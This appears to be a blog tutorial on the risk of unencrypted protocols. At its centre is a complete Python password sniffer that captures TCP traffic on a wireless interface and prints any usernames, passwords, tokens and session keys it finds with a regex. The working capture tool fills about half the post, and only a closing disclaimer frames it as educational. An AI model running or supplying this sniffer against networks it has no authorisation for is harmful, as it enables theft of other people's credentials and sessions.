danger of unencrypted protocols with Password Sniffer

 

 

 

 

The internet, as wel as local area networks, consist of a huge number of services. You use HTTP(s) for surfing web pages, SMTP to send emails, POP3 or IMAP to read emails, ICQ, IRC, Skype or jabber to chat and so on. A Network Simple Sniffer tool  in python3

Most people should by now have heard that HTTP without the S is insecure and should not be used to send one's bank account data thourgh the net. However most protocols for daily use are plaintext protocols, like ICQ or SMTP and IMAP/POP3. Facebook, the biggest social network of the world has recently adopted HTTPS as default. One can activate SSL encryption for most commonly used protocols or install a SSL proxy in front of a service if it doesn't support SSL by itself, but only a few people care about data security and encryption.

Unencrypted network traffic is the low hanging fruit every attacker is searching for. Why should an attacker try to crack passwords if he can easily read them? danger of unencrypted protocols with Password Sniffer

Password Sniffer

The danger of unencrypted protocols can most effectively be demonstrated with the help of a password sniffer. Even fellow men, that “do not have anything to hide”, recognize that the interception of their username and password is an act that endangers their privacy and they would like to avoid it if possible. Therefore we will now write a program that will try to hunt for username and password combination by matching predefined strings to the packets payload and dump them on the display. To do so, we will adapt the source cod.

#!/usr/bin/python3

import sys
import re
import getopt
import pcapy
from impacket.ImpactDecoder import EthDecoder, IPDecoder, TCPDecoder


#interface to sniff on
dev = "wlan0"

#pcap filter
filter = "tcp"

#Decoder for all layers
eth_dec = EthDecoder()
ip_dec = IPDecoder()
tcp_dec = TCPDecoder()

#pattern that match username and passwords

pattern = re.compile(r"""(?P<found>(USER|USERNAME|PASS|PASSWORD|LOGIN|BENUTZER|PASSWORD|AUTH|ACCESS|ACCESS_?KEY|SESSION|SESSION_?KEY|TOKEN)[=:\s].+)\B""",
                     re.MULTILINE|re.IGNORECASE)

#This function will be called for every packet, decode it and try to find a username or password in it.

def handle_packet(hdr, data):
    eth_pkt = eth_dec.decode(data)
    ip_pkt = ip_dec.decode(eth_pkt.get_data_as_string())
    tcp_pkt = tcp_dec.decode(ip_pkt.get_data_as_string())
    payload = ip_pkt.get_data_as_string()
   
    match = re.search(pattern, payload)
    if not tcp_pkt.get_SYN() and not tcp_pkt.get_RST() and \
           not tcp_pkt.get_FIN() and match and \
           match.groupdict()['found'] != None:
           print("%s:%d -> %s:%d" % (ip_pkt.get_ip_src(),tcp_pkt.get_th_sport(),ip_pkt.get_ip_dst(),tcp_pkt.get_th_dport()))
           print("\t%s\n" % (match.groupdict()['found']))

def usage():
    print(sys.argv[0] + " -i <dev> -f <pcap_filter>")
    sys.exit(1)

# Parsing parameter
try:
   cmd_opts = "f:i:"
   opts, args = getopt.getopt(sys.argv[1:], cmd_opts)

except getopt.GetoptError:
   usage()


for opt in opts:
    if opt[0] == "-f":
       filter = opt[1]
    elif opt[0] == "-i":
       dev = opt[1]
    else:
       usage()

# Start sniffing
pcap = pcapy.open_live(dev, 1500, 0, 100)
pcap.setfilter(filter)
print("Sniffing passwords on " + str(dev))
pcap.loop(10, handle_packet)

This time we filter TCP traffic, because the author is not aware of any UDP based protocols that have a login or authentication mechanism.

For a decoder we additionally define IPDecoder and TCPDecoder to extract the IP- and TCP header by applying the function handle_packet. Therefore we provide the packet from the previous layer to the decoder, though IPDecoder gets the ETH packet, the TCPDecoder an IP packet and so forth. The payload of the IP packet can be accessed as an ASCII-string with the help of the method get_data_as_string(), which sometimes leads to ugly undisplayable characters, especially when dumping binary data. Therefore we first match the payload against a regular expression (Sect. 3.9) to make sure it contains a string like User, Pass, Password or Login. In contrast to regular password sniffers, our sniffer does not just search in predefined protocols but in all TCP traffic and tries to detect other authentication mechanisms like session keys and cookies beside username and password combinations.

I hope you liked this post, then you should not forget to share this post at all.
Thank you so much :-)

 

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.